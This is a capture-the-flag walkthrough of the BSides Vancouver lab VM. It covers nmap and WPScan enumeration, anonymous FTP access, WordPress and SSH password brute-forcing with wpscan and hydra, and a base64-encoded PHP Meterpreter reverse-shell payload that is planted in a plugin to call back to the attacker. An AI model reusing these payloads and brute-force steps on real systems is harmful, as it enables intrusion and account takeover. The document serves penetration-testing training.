Lets Discover the network
root@kali:~/Desktop/scripts# nmap -F 192.168.224.4
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 03:00 EDT
Nmap scan report for 192.168.224.4
Host is up (0.000088s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.25 secondsMachine Found lets hit it with more aggressive scan
root@kali:~/Desktop/scripts# nmap -A -O -sV -sS 192.168.224.4 --script="http-enum.nse"
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 03:01 EDT
Nmap scan report for 192.168.224.4
Host is up (0.00073s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-enum:
|_ /robots.txt: Robots file
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.224.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.10 secondsNow Reading the Robots.txt File
User-agent: *
Disallow: /backup_wordpress
Lets Check the directory , its wordpress so its WPScan time
root@kali:~/Desktop/scripts# wpscan --url http://192.168.224.4/backup_wordpress/ --enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.224.4/backup_wordpress/
[+] Started: Wed Apr 4 03:18:59 2018
[!] The WordPress 'http://192.168.224.4/backup_wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: </backup_wordpress/?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3.26
[+] XML-RPC Interface available under: http://192.168.224.4/backup_wordpress/xmlrpc.php
[!] Includes directory has directory listing enabled: http://192.168.224.4/backup_wordpress/wp-includes/
[+] WordPress version 4.5 (Released on 2016-04-12) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 40 vulnerabilities identified from the version number
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.5.2
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.5.3
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.5.4
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.5.4
[!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
Reference: https://wpvulndb.com/vulnerabilities/8714
Reference: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
Reference: https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
Reference: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
[i] Fixed in: 4.7.1
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.5.5
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.5.5
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.5.5
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.5.5
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.5.5
[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.5.6
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.5.6
[!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
Reference: https://wpvulndb.com/vulnerabilities/8731
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
[i] Fixed in: 4.5.6
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.5.7
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.5.7
[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.5.7
[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://hackerone.com/reports/153093
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.5.7
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://core.trac.wordpress.org/ticket/25239
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
Reference: https://wpvulndb.com/vulnerabilities/8815
Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
[i] Fixed in: 4.5.9
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
Reference: https://wpvulndb.com/vulnerabilities/8816
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
[i] Fixed in: 4.5.9
[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
Reference: https://wpvulndb.com/vulnerabilities/8817
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
[i] Fixed in: 4.5.9
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
Reference: https://wpvulndb.com/vulnerabilities/8818
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
[i] Fixed in: 4.5.9
[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
Reference: https://wpvulndb.com/vulnerabilities/8819
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
Reference: https://hackerone.com/reports/203515
Reference: https://hackerone.com/reports/203515
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
[i] Fixed in: 4.5.9
[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
Reference: https://wpvulndb.com/vulnerabilities/8820
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
[i] Fixed in: 4.5.9
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.5.10
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41398
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.5.10
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41457
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.5.10
[!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
Reference: https://wpvulndb.com/vulnerabilities/8913
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41448
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
[i] Fixed in: 4.5.10
[!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
Reference: https://wpvulndb.com/vulnerabilities/8914
Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/41395
Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
[i] Fixed in: 4.5.10
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
Reference: https://twitter.com/ircmaxell/status/923662170092638208
Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
[i] Fixed in: 4.5.11
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.5.12
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.5.12
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.5.12
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.5.12
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.5.13
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentysixteen - v1.2
[+] Name: twentysixteen - v1.2
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://192.168.224.4/backup_wordpress/wp-content/themes/twentysixteen/
| Readme: http://192.168.224.4/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.4
| Style URL: http://192.168.224.4/backup_wordpress/wp-content/themes/twentysixteen/style.css
| Referenced style.css: wp-content/themes/twentysixteen/style.css
| Theme Name: Twenty Sixteen
| Theme URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
Time: 00:00:02 <=======================> (1630 / 1630) 100.00% Time: 00:00:02
[+] No plugins found
[+] Enumerating installed themes (only ones with known vulnerabilities) ...
Time: 00:00:00 <=========================> (285 / 285) 100.00% Time: 00:00:00
[+] No themes found
[+] Enumerating timthumb files ...
Time: 00:00:04 <=======================> (2541 / 2541) 100.00% Time: 00:00:04
[+] No timthumb files found
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Wed Apr 4 03:19:16 2018
[+] Requests Done: 4514
[+] Memory used: 157.734 MB
[+] Elapsed time: 00:00:17The Important Part we have 2 Users now admin , john now
now I have tried to brute force both passwords didn't work out
I have tried to login to the FTP and noticed this message
root@kali:~/Desktop/SecLists/Passwords# ftp 192.168.224.4
Connected to 192.168.224.4.
220 (vsFTPd 2.3.5)
Name (192.168.224.4:root): admin
530 This FTP server is anonymous only.
Login failed.so lets try to login again anonymously
Yaaaay we are in :-D
root@kali:~/Desktop/Walkthrough/BSides Vancouver# ftp 192.168.224.4
Connected to 192.168.224.4.
220 (vsFTPd 2.3.5)
Name (192.168.224.4:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
226 Directory send OK.now lets explore the system
[+] Found users.txt.bk in this directory /public/users.txt.bk
abatchy
john
mai
anne
doomguy
inside I have bunch of names so its a matter of brute force ssh and/or wordpress login
Brute Force Wordpress Login using Hydra for user john
wpscan --username john --wordlist ~/Desktop/SecLists/Passwords/Common-Credentials/10k-most-common.txt --url http://192.168.224.3/backup_wordpress/I have got this message during the brute force
[!] ERROR: We received an unknown response for login: john and password: enigma
I have tried it manually and indeed it was the correct password to log me in :D Now Lets Craft our PHP Payload
msf payload(php/meterpreter/reverse_tcp) > options
Module options (payload/php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
msf payload(php/meterpreter/reverse_tcp) > set lhost eth0
lhost => 192.168.224.4
msf payload(php/meterpreter/reverse_tcp) > generate -t raw -e php/base64
eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMjI0LjQnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2so.Ik5sZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));Lets Pick a Plugin and add this shell code to it I have added the Payload to Plugin called Holly Dolly you can use any plugin now lets run the exploit/handler/ before we activate the plugin
msf payload(php/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost eth0
lhost => eth0
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.224.4:4444 Now that the Handler is ready lets activate the plugin
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.224.4:4444
[*] Sending stage (37543 bytes) to 192.168.224.3
[*] Meterpreter session 1 opened (192.168.224.4:4444 -> 192.168.224.3:42337) at 2018-04-14 09:15:40 -0400
meterpreter > Booooooooooom We have our Meterpreter session open :-D
now when we go to /home we have found there are 5 users , lets see the ssh config file which is located /etc/sshd_config
Match User abatchy,john,mai,doomguy
PasswordAuthentication no
Note that there are 4 users out of 5 are not allowed to do Password Authentication for SSH which leave us with one option anne
Brute Forcing the SSH for the user anne
root@kali:~/Desktop/SecLists/Passwords# hydra -l anne -P rockyou.txt 192.168.224.3 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-14 10:23:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.224.3:22/
[22][ssh] host: 192.168.224.3 login: anne password: princess
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 10 final worker threads did not complete until end.
[ERROR] 10 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
